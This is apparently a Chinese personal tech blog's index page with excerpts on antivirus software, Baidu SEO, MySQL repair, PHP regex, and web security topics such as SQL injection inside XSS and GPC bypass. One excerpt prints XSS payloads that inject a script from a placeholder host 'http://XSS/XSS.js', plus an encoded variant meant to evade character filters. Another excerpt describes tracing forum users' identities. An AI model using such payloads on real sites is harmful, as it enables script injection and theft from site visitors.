非's Blog

先谈谈瑞星！ 先谈谈瑞星！


第5代引擎，立体防毒。支持Intel最新超线程处理器。
新增漏洞扫描系统，第一时间发现系统漏洞，并提供解决方案。
全新信息中心，第一时间得知瑞星升级信息和重大病毒信息。
无需下载手工升级包，一键智能升级。
首创网络游戏防盗抢功能的个人防火墙·
针对冲击波等漏洞型网络病毒设计的漏洞扫描系统·
全新智能化数据修复系统
方便快捷的交互式手机短信通
嵌入式即时安全信息中心

...Read More...

1.百度联盟的申请问题，很多朋友都还没有百度联盟的帐号，百度联盟的地址是 union.baidu.com 只要你的站有一定流量，比如 100IP/天就可以申请百度联盟。很明显，成为百度联盟的会员有利于提高在百度上的排名。（不过这也只是百度排名的一个因素），所以，无论是为了流量还是为了赚钱，你都有必要申请百度联盟。
1.1申请的条件，只要你的站不违法，不作弊，不涉及敏感问题，通过的几率为100%。
当然，你申请的是百度联盟的搜索业务（目前有搜索业务，主题推广，网吧业务，软件业务四种），搜索业务是百度联盟中门槛最低的。这样说并不是搜索业务并不赚钱，根据我和我朋友的经验，搜索业务的单次点击价格可以达到0.2RMB但是由于很多网站的流量来自百度，所以用户很少会去理会百度搜索框，因此搜索框一般点击很低，但是一旦点击就是用户却有需要，因此搜索矿的单价很高。更为重要的是搜索框能够让百度在更短的时间内注意到你的站，比如站内一个页面B放了百度搜索框，那么它比没有放搜索框的页面A更块引起百度的注意。这里给大家延伸下，如果你网站放满GG广告可能不招百度喜欢，放搜索框的第三个理由是百度搜索框是申请百度主题推广的必要前提。
...Read More...

Sql-injection In Xss[SIX]
BY superhei@ph4nt0m.org 07/09/03
SIX存在的意义：
1、有权限限制的地方总是让人比较放心，比如后台、内网 .... 。而且有的程序官方否认后台漏洞的危险，比如*vbbs对以前那个数据备用得到shell的态度。的确，在权限的限制下，这样的漏洞很难直接被利用。 Xss就和上面的情况一样，也经常被程序员忽视，而且也不太好防，如果2个情况配合起来，那就意味着利用的难度将大大下降...
...Read More...

昨晚受学校老师委托，调查某人资料(是因为在学校BBS上乱发东西所以受到追查)，老师给的ID是zszs11和lymft。这个2个ID看着都很随意，由于以前是也曾今得到过这个BBS权限所以管理员同志希望我协助维护，所以也给了我一个管理ID,不过太久没上已经被删除了。于是乎没办法上后台进行操作查询用户信息，前台查询到的信息太少。zszs11注册邮箱是zszs11@***.com，lymft则是lymftRead More...

　如在http://www.baidu.com/search/url_submit.html百度网站登陆页面登陆网,;提交完后将有提示提交成功!

　　一天,俩天,三天....都过去了,百度却仍然没有收录,到底是什么原因呢?

　　1).百度收录速度慢,正常来讲,我把http://www.fucai3d.org同时提交到百度、GOOGLE、雅虎和SOSO。半天不到，被GOOGLE收录了，虽然只收录了黑马股票网首页，但总的来说，速度还是很快的。所以可以预测，收录最慢的应该是百度。这是我从提交N个站后得来的结论。记得我之前一个站，提交后一个月后才被百度收录，真是郁闷。
...Read More...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前：

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >

...Read More...

在假设设计上不存在问题（即人解决某个应用的方式不存在问题）以及所采用的语言以及其他周边组件是安全的情况下，程序的漏洞就大部分就是由于在实现问题的过程中，程序员对安全的漠视或是对安全的不太了解造成的，而从程序的角度看，这种漏洞不外乎是不安全的参数进入不安全的操作中引起的。

Read More...

正则表达式简介及正则表达式在PHP中的作用
正则表达式是一种表示规则的途经，在 PHP 中利用这些规则可以让你灵活变通地匹配、检验、替换以及字符串。本文涉及到 PCRE 的基础，以及如何使用 preg_match()，preg_replace()，and preg_split() 函数。
...Read More...

mysql数据文件破坏后的修复方法
由于临时断电，使用kill -9中止MySQL服务进程，所有的这些都可能会毁坏MySQL的数据文件。如果在被干扰时，服务正在改变文件，文件可能会留下错误的或不一致的状态。因为这样的毁坏有时是不容易被发现的，当你发现这个错误时可能是很久以后的事了。于是，当你发现这个问题时，也许所有的备份都有同样的错误。

MySQL参考手册的第十五章讲述了MySQL自带的myisamchk的功能，以及如何使用它检查和修复你的MySQL数据文件。虽然这一章对于每个想要搭建一个强壮的MySQL服务的人都是推荐阅读的，我们还是有必要在这里对其中的要点进行讨论。
...Read More...

PHP中绕过GPC的情况有很多，本文仅仅是总结了一些比较常见的Read More...